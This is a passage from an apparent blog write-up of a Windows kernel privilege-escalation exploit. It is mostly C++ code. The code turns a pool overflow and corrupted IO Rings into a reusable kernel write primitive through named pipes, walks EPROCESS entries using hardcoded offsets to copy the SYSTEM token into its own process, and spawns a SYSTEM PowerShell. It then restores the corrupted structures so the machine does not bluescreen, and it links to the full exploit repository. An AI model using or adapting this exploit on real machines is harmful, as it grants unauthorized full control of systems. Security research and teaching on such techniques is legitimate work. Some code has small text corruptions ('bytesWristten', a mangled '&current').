BYTE* payload = GenerateOverflowData(IORING_CHUNK_SIZE, overflowData, 0x48, &payloadSize);
// Send the overflow payload to corrupt the first IORing
CreateDummyProcess(payload, payloadSize);
IOCTLThread.join();
break;
}
else
{
// If the overflow is not before an IO Ring, free the rings and retrys
CreateDummyProcess(NULL, 0);
IOCTLThread.join();
}
}
// Fire first IORing to corrupt the reusable one, write primitive now enabled
exploitManager.Read(&reusableIORingOriginalValue, reusableIORingCorruptionAddr, sizeof(UINT64));
TriggerIORing(ioRingManager.corruptedRing, (UINT64)exploitManager.fakeRegBuffer);
With this full chain, I am able to get a write primitive that is reusable and can access the kernel virtual address space. All I need to do is create a named pipe that will be used as the input file for the IO Ring. Windows treats named pipes just like files, so I can write to my data to a named pipe instead of having to write the data to disk. Then I then swap the address pointer in my forged regbuffer to my target address. From there I simply trigger the write by submitting to the IO Ring.
void ExploitManager::Write(BYTE* iDestinationAddr, UINT64 data)
{
fakeRegBuffer->Address = iDestinationAddr;
TriggerIORing(reusableIORing, data);
}
void TriggerIORing(HIORING ioRing, UINT64 data)
{
LPCSTR pipeName = "\\\\.\\pipe\\IoRingPayloadPipe";
HANDLE hReadPipe = CreateNamedPipeA(
pipeName,
PIPE_ACCESS_INBOUND | FILE_FLAG_OVERLAPPED,
PIPE_TYPE_BYTE | PIPE_WAIT,
1,
0x1000,
0x1000,
0,
NULL
);
if (hReadPipe == INVALID_HANDLE_VALUE) {
printf(" [!] Failed to create read pipe.\n");
return;
}
HANDLE hWritePipe = CreateFileA(
pipeName,
GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hWritePipe == INVALID_HANDLE_VALUE) {
printf(" [!] Failed to open write pipe.\n");
CloseHandle(hReadPipe);
return;
}
// 2. Setup and write payload
BYTE payload[8] = { 0 };
memcpy(payload, &data, 0x8);
DWORD bytesWritten = 0;
WriteFile(hWritePipe, payload, sizeof(payload), &bytesWristten, NULL);
// 3. Queue the read
IORING_HANDLE_REF fileRef = IoRingHandleRefFromHandle(hReadPipe);
IORING_BUFFER_REF bufferRef = IoRingBufferRefFromIndexAndOffset(0, 0);
HRESULT status = BuildIoRingReadFile(ioRing, fileRef, bufferRef, sizeof(payload), 0, NULL, IOSQE_FLAGS_NONE);
// 4. Submit to kernel
UINT32 submittedEntries = 0;
status = SubmitIoRing(ioRing, 1, INFINITE, &submittedEntries);
// 5. Clean up the completion queue
IORING_CQE cqe = { 0 };
HRESULT popStatus = PopIoRingCompletion(ioRing, &cqe);
// 6. Close handles to prevent leaks
CloseHandle(hWritePipe);
CloseHandle(hReadPipe);
}With all of this handled, I now have a reusable write primitive. The next step is to employ my read and write primitives to achieve a full privilege escalation by swapping my process token.
Stealing the SYSTEM Token and Cleaning Up
Now that I have working read and write primitives, I need to use them to actually do something. For this exploit, I simply want to elevate privileges. This can be done by taken the token from the SYSTEM EPROCESS and replacing the token of my own process with it. However, much more can be done with read and write primitives if wanted. In the future I plan on developing a proof of concept rootkit loader using read and write primitives.
However, for this exploit I will stick to basic data only attacks. To begin, I walk the EPROCESS chain until I find a process with PID 4 which is always the SYSTEM process. From there, I save the token associated with the SYSTEM process. I then simply replace my own token in my EPROCESS with the SYSTEM token. This effectively gives my process full access to whatever within the system. The following code shows how I go about walking the EPROCESSes starting with my own I leaked earlier.
printf("\n [*] ###### Stealing System Token ######\n");
UINT64 startEPROCESS = EPROCESS;
UINT64 currentEPROCESS = EPROCESS;
UINT64 systemToken = 0x0;
// Walk process list until system is found
while (true)
{
UINT64 pid = 0;
// Get PID value
exploitManager.Read(&pid, currentEPROCESS + 0x1d0, 0x8);
if (pid == 0x4)
{
printf(" [*] Found System Process!\n");
// Steal system Token
exploitManager.Read(&systemToken, currentEPROCESS + 0x248, 0x8);
printf(" [*] Found System Token: %p\n", systemToken);
break;
}
// Continue down the list
exploitManager.Read(¤tEPROCESS, currentEPROCESS + 0x1d8, 0x8);
currentEPROCESS -= 0x1d8;
if (currentEPROCESS == startEPROCESS)
{
printf(" [!] Searched the whole list. System process not found.\n");
break;
}
}
// Overwrite our token with system
BYTE* currentToken = (BYTE*)EPROCESS + 0x248;
printf("\n [*] Overwriting current token at %p\n", currentToken);
exploitManager.Write(currentToken, systemToken);From this point I simply spawn an instance of powershell. This will inherit my process’ token and will also have system access. From this point on the powershell be running as NT Authority/System and the full privilege escalation is achieved.

There is still some clean up that needs to be done. If the user were to close the command prompt, the corrupted named pipe DQEs and I/O Rings would cause the system to crash when the kernel attempts to free them. This means I have to patch the original values back before I let the process exits. This will make sure the values all line up before the kernel attempts to free them and prevents a bluescreen. The following is how I went about doing that.
printf("\n [*] ###### Patching Corrupted Values ######\n");
// Find the location of the corrupted pipe
UINT64 corruptPipeObj = exploitManager.HandleToPointer(arbRePipes.corruptedPipe);
UINT64 corruptedPipeClientManager;
exploitManager.Read(&corruptedPipeClientManager, corruptPipeObj + 0x20, sizeof(UINT64));
corruptedPipeClientManager &= 0xfffffffffffffff0;
printf(" [*] Corrupted Pipe Address Found: %p\n", corruptedPipeClientManager);
// Restore pipe linked list killing the read primitive
printf(" [*] Restoring Corrupted Pipe\n");
UINT64 pipe1Addr;
UINT64 pipe2Addr;
UINT64 pipeLink;
UINT64 corruptedPipeRestoreValue;
exploitManager.Read(&pipe1Addr, corruptedPipeClientManager + 0x48, sizeof(UINT64));
exploitManager.Read(&pipe2Addr, corruptedPipeClientManager + 0x50, sizeof(UINT64));
exploitManager.Read(&pipeLink, pipe1Addr, sizeof(UINT64));
if (pipeLink != pipe2Addr)
{
exploitManager.Write((BYTE*)(pipe1Addr - 0x10), 0x7246704e02000000);
exploitManager.Write((BYTE*)(pipe1Addr), pipe2Addr);
}
else
{
exploitManager.Write((BYTE*)(pipe2Addr - 0x10), 0x7246704e02000000);
exploitManager.Write((BYTE*)(pipe2Addr), corruptedPipeClientManager + 0x48);
}
// -------------- Read Primitive Disabled --------------
printf(" [*] Restoring Corrupted IORings\n");
for (int i = 0; i < 0x70; i += 0x8)
exploitManager.Write((BYTE*)(ioRingManager.corruptedRingEntryAddr+i), ioRingManager.corruptedRingOriginalData[i/8]);
exploitManager.Write((BYTE*)(reusableIORingCorruptionAddr), reusableIORingOriginalValue);Full Exploit Demo
Exploit Github: https://github.com/Kalagious/RevoDetectorExploit/tree/master
Helpful Resources
Vergilius Project: Compilation of community reverse engineered Closed Source Windows kernel structures.
https://www.vergiliusproject.com
vp777 Windows Non-Paged Pool Overflow Exploitation: Github project explaining how Named Pipes can be used for arbitrary read primitive.
http://github.com/vp777/Windows-Non-Paged-Pool-Overflow-Exploitation/blob/master/readme.md
